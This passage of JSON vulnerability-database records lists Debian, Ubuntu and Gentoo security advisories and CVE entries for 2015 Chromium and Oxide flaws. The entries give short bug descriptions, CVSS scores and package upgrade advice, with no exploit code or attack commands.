["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-1261", "CVE-2015-3910", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2022-08-10T07:06:46", "id": "OSV:DSA-3267-1", "href": "https://osv.dev/vulnerability/DSA-3267-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:07:14", "description": "\nSeveral vulnerabilities were discovered in the chromium web browser.\n\n\n* [CVE-2015-1266](https://security-tracker.debian.org/tracker/CVE-2015-1266)\nIntended access restrictions could be bypassed for certain URLs like\n chrome://gpu.\n* [CVE-2015-1267](https://security-tracker.debian.org/tracker/CVE-2015-1267)\nA way to bypass the Same Origin Policy was discovered.\n* [CVE-2015-1268](https://security-tracker.debian.org/tracker/CVE-2015-1268)\nMariusz Mlynski also discovered a way to bypass the Same Origin Policy.\n* [CVE-2015-1269](https://security-tracker.debian.org/tracker/CVE-2015-1269)\nMike Rudy discovered that hostnames were not properly compared in the\n HTTP Strict Transport Policy and HTTP Public Key Pinning features,\n which could allow those access restrictions to be bypassed.\n* [CVE-2015-1270](https://security-tracker.debian.org/tracker/CVE-2015-1270)\nAtte Kettunen discovered an uninitialized memory read in the ICU library.\n* [CVE-2015-1271](https://security-tracker.debian.org/tracker/CVE-2015-1271)\ncloudfuzzer discovered a buffer overflow in the pdfium library.\n* [CVE-2015-1272](https://security-tracker.debian.org/tracker/CVE-2015-1272)\nChamal de Silva discovered race conditions in the GPU process\n implementation.\n* [CVE-2015-1273](https://security-tracker.debian.org/tracker/CVE-2015-1273)\nmakosoft discovered a buffer overflow in openjpeg, which is used by\n the pdfium library embedded in chromium.\n* [CVE-2015-1274](https://security-tracker.debian.org/tracker/CVE-2015-1274)\nandrewm.bpi discovered that the auto-open list allowed certain file\n types to be executed immediately after download.\n* [CVE-2015-1276](https://security-tracker.debian.org/tracker/CVE-2015-1276)\nColin Payne discovered a use-after-free issue in the IndexedDB\n implementation.\n* [CVE-2015-1277](https://security-tracker.debian.org/tracker/CVE-2015-1277)\nSkyLined discovered a use-after-free issue in chromium's accessibility\n implementation.\n* [CVE-2015-1278](https://security-tracker.debian.org/tracker/CVE-2015-1278)\nChamal de Silva discovered a way to use PDF documents to spoof a URL.\n* [CVE-2015-1279](https://security-tracker.debian.org/tracker/CVE-2015-1279)\nmlafon discovered a buffer overflow in the pdfium library.\n* [CVE-2015-1280](https://security-tracker.debian.org/tracker/CVE-2015-1280)\ncloudfuzzer discovered a memory corruption issue in the SKIA library.\n* [CVE-2015-1281](https://security-tracker.debian.org/tracker/CVE-2015-1281)\nMasato Knugawa discovered a way to bypass the Content Security\n Policy.\n* [CVE-2015-1282](https://security-tracker.debian.org/tracker/CVE-2015-1282)\nChamal de Silva discovered multiple use-after-free issues in the\n pdfium library.\n* [CVE-2015-1283](https://security-tracker.debian.org/tracker/CVE-2015-1283)\nHuzaifa Sidhpurwala discovered a buffer overflow in the expat\n library.\n* [CVE-2015-1284](https://security-tracker.debian.org/tracker/CVE-2015-1284)\nAtte Kettunen discovered that the maximum number of page frames\n was not correctly checked.\n* [CVE-2015-1285](https://security-tracker.debian.org/tracker/CVE-2015-1285)\ngazheyes discovered an information leak in the XSS auditor,\n which normally helps to prevent certain classes of cross-site\n scripting problems.\n* [CVE-2015-1286](https://security-tracker.debian.org/tracker/CVE-2015-1286)\nA cross-site scripting issue was discovered in the interface to\n the v8 javascript library.\n* [CVE-2015-1287](https://security-tracker.debian.org/tracker/CVE-2015-1287)\nfiledescriptor discovered a way to bypass the Same Origin Policy.\n* [CVE-2015-1288](https://security-tracker.debian.org/tracker/CVE-2015-1288)\nMike Ruddy discovered that the spellchecking dictionaries could\n still be downloaded over plain HTTP (related to [CVE-2015-1263](https://security-tracker.debian.org/tracker/CVE-2015-1263)).\n* [CVE-2015-1289](https://security-tracker.debian.org/tracker/CVE-2015-1289)\nThe chrome 44 development team found and fixed various issues\n during internal auditing.\n\n\nIn addition to the above issues, Google disabled the hotword extension\nby default in this version, which if enabled downloads files without\nthe user's intervention.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 44.0.2403.89-1~deb8u1.\n\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 44.0.2403.89-1.\n\n\nWe recommend that you upgrade your chromium-browser packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-07-23T00:00:00", "type": "osv", "title": "chromium-browser - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1266", "CVE-2015-1288", "CVE-2015-1281", "CVE-2015-1268", "CVE-2015-1263", "CVE-2015-1267", "CVE-2015-1286", "CVE-2015-1289", "CVE-2015-1270", "CVE-2015-1272", "CVE-2015-1283", "CVE-2015-1279", "CVE-2015-1274", "CVE-2015-1287", "CVE-2015-1282", "CVE-2015-1285", "CVE-2015-1276", "CVE-2015-1278", "CVE-2015-1269", "CVE-2015-1277", "CVE-2015-1271", "CVE-2015-1273", "CVE-2015-1280", "CVE-2015-1284"], "modified": "2022-08-10T07:06:28", "id": "OSV:DSA-3315-1", "href": "https://osv.dev/vulnerability/DSA-3315-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2023-12-04T00:20:50", "description": "## Releases\n\n * Ubuntu 15.04 \n * Ubuntu 14.10 \n * Ubuntu 14.04 ESM\n\n## Packages\n\n * oxide-qt \\- Web browser engine library for Qt (QML plugin)\n\nSeveral security issues were discovered in the DOM implementation in \nBlink. If a user were tricked in to opening a specially crafted website, \nan attacker could potentially exploit these to bypass Same Origin Policy \nrestrictions. (CVE-2015-1253, CVE-2015-1254)\n\nA use-after-free was discovered in the WebAudio implementation in \nChromium. If a user were tricked in to opening a specially crafted \nwebsite, an attacker could potentially exploit this to cause a denial of \nservice via renderer crash, or execute arbitrary code with the privileges \nof the sandboxed render process. (CVE-2015-1255)\n\nA use-after-free was discovered in the SVG implementation in Blink. If a \nuser were tricked in to opening a specially crafted website, an attacker \ncould potentially exploit this to cause a denial of service via renderer \ncrash, or execute arbitrary code with the privileges of the sandboxed \nrender process. (CVE-2015-1256)\n\nA security issue was discovered in the SVG implementation in Blink. If a \nuser were tricked in to opening a specially crafted website, an attacker \ncould potentially exploit this to cause a denial of service via renderer \ncrash. (CVE-2015-1257)\n\nAn issue was discovered with the build of libvpx. If a user were tricked \nin to opening a specially crafted website, an attacker could potentially \nexploit this to cause a denial of service via renderer crash, or execute \narbitrary code with the privileges of the sandboxed render process. \n(CVE-2015-1258)\n\nMultiple use-after-free issues were discovered in the WebRTC \nimplementation in Chromium. If a user were tricked in to opening a \nspecially crafted website, an attacker could potentially exploit these to \ncause a denial of service via renderer crash, or execute arbitrary code \nwith the privileges of the sandboxed render process. (CVE-2015-1260)\n\nAn uninitialized value bug was discovered in the font shaping code in \nBlink. If a user were tricked in to opening a specially crafted website, \nan attacker could potentially exploit this to cause a denial of service \nvia renderer crash. (CVE-2015-1262)\n\nMultiple security issues were discovered in Chromium. If a user were \ntricked in to opening a specially crafted website, an attacker could \npotentially exploit these to read uninitialized memory, cause a denial \nof service via application crash or execute arbitrary code with the \nprivileges of the user invoking the program. (CVE-2015-1265)\n\nMultiple security issues were discovered in V8. If a user were tricked \nin to opening a specially crafted website, an attacker could potentially \nexploit these to read uninitialized memory, cause a denial of service via \nrenderer crash or execute arbitrary code with the privileges of the \nsandboxed render process. (CVE-2015-3910)\n", "cvss3": {}, "published": "2015-05-21T00:00:00", "type": "ubuntu", "title": "Oxide vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1265", "CVE-2015-3910"], "modified": "2015-05-21T00:00:00", "id": "USN-2610-1", "href": "https://ubuntu.com/security/notices/USN-2610-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2023-12-03T17:36:49", "description": "### Background\n\nChromium is an open-source web browser project.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker can cause arbitrary remote code execution, Denial of Service or bypass of security mechanisms. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-43.0.2357.65\"", "cvss3": {}, "published": "2015-06-23T00:00:00", "type": "gentoo", "title": "Chromium: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234", "CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1243", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1250", "CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-06-23T00:00:00", "id": "GLSA-201506-04", "href": "https://security.gentoo.org/glsa/201506-04", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2021-12-14T17:47:14", "description": "PDFium, as used in Google Chrome before 43.0.2357.65, does not properly initialize memory, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1259", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1259"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1259", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1259", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "android/java/src/org/chromium/chrome/browser/WebsiteSettingsPopup.java in Google Chrome before 43.0.2357.65 on Android does not properly restrict use of a URL's fragment identifier during construction of a page-info popup, which allows remote attackers to spoof the URL bar or deliver misleading popup content via crafted text.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1261", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1261"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1261", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1261", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Use-after-free vulnerability in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document that leverages improper handling of a shadow tree for a use element.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1256", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1256"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1256", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T15:22:25", "description": "Google Chrome before 43.0.2357.65 relies on libvpx code that was not built with an appropriate --size-limit value, which allows remote attackers to trigger a negative value for a size field, and consequently cause a denial of service or possibly have unspecified other impact, via a crafted frame size in VP9 video data.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1258", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1258", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1258", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "platform/graphics/filters/FEColorMatrix.cpp in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, does not properly handle an insufficient number of values in an feColorMatrix filter, which allows remote attackers to cause a denial of service (container overflow) or possibly have unspecified other impact via a crafted document.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1257", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1257"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1257", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1257", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "core/html/parser/HTMLConstructionSite.cpp in the DOM implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to bypass the Same Origin Policy via crafted JavaScript code that appends a child to a SCRIPT element, related to the insert and executeReparentTask functions.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1253", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1253"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1253", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1253", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Multiple use-after-free vulnerabilities in content/renderer/media/user_media_client_impl.cc in the WebRTC implementation in Google Chrome before 43.0.2357.65 allow remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code that executes upon completion of a getUserMedia request.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1260", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1260"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1260", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1260", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "platform/fonts/shaping/HarfBuzzShaper.cpp in Blink, as used in Google Chrome before 43.0.2357.65, does not initialize a certain width field, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted Unicode text.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1262", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1262"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1262", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Cross-site scripting (XSS) vulnerability in Google Chrome before 43.0.2357.65 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted data that is improperly handled by the Bookmarks feature.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1264", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1264"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1264", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1264", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:14", "description": "core/dom/Document.cpp in Blink, as used in Google Chrome before 43.0.2357.65, enables the inheritance of the designMode attribute, which allows remote attackers to bypass the Same Origin Policy by leveraging the availability of editing.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1254", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1254"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1254", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1254", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Use-after-free vulnerability in the SpeechRecognitionClient implementation in the Speech subsystem in Google Chrome before 43.0.2357.65 allows remote attackers to execute arbitrary code via a crafted document.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1251", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1251", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1251", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Use-after-free vulnerability in content/renderer/media/webaudio_capturer_source.cc in the WebAudio implementation in Google Chrome before 43.0.2357.65 allows remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact by leveraging improper handling of a stop action for an audio track.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1255", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1255"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1255", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1255", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "Multiple unspecified vulnerabilities in Google Chrome before 43.0.2357.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1265", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1265"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1265", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T17:47:14", "description": "The Spellcheck API implementation in Google Chrome before 43.0.2357.65 does not use an HTTPS session for downloading a Hunspell dictionary, which allows man-in-the-middle attackers to deliver incorrect spelling suggestions or possibly have unspecified other impact via a crafted file.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1263", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1263", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1263", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-12-14T17:47:14", "description": "common/partial_circular_buffer.cc in Google Chrome before 43.0.2357.65 does not properly handle wraps, which allows remote attackers to bypass a sandbox protection mechanism or cause a denial of service (out-of-bounds write) via vectors that trigger a write operation with a large amount of data, related to the PartialCircularBuffer::Write and PartialCircularBuffer::DoWrite functions.", "cvss3": {}, "published": "2015-05-20T10:59:00", "type": "debiancve", "title": "CVE-2015-1252", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1252"], "modified": "2015-05-20T10:59:00", "id": "DEBIANCVE:CVE-2015-1252", "href": "https://security-tracker.debian.org/tracker/CVE-2015-1252", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-17T19:29:31", "description": "The Spellcheck API implementation in Google Chrome before 44.0.2403.89 does not use an HTTPS session for downloading a Hunspell dictionary, which allows man-in-the-middle attackers to deliver incorrect spelling suggestions or possibly have unspecified other impact via a crafted file, a related issue to CVE-2015-1263.", "cvss3": {}, "published": "2015-07-23T00:59:00", "type": "debiancve", "title": "CVE-2015-1288", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": 